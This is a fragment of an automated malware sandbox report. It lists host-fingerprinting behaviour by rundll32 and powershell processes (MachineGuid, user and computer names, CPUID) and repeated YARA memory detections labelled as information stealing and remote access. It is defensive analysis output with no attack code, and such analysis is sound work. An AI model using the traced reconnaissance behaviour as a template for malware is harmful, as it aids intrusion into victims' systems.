Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D5710 cpuid 3_2_050D5710
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D28A7 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep, 3_2_050D28A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D3BEF GetVersionExA,wsprintfA, 3_2_050D3BEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D5710 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_050D5710

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs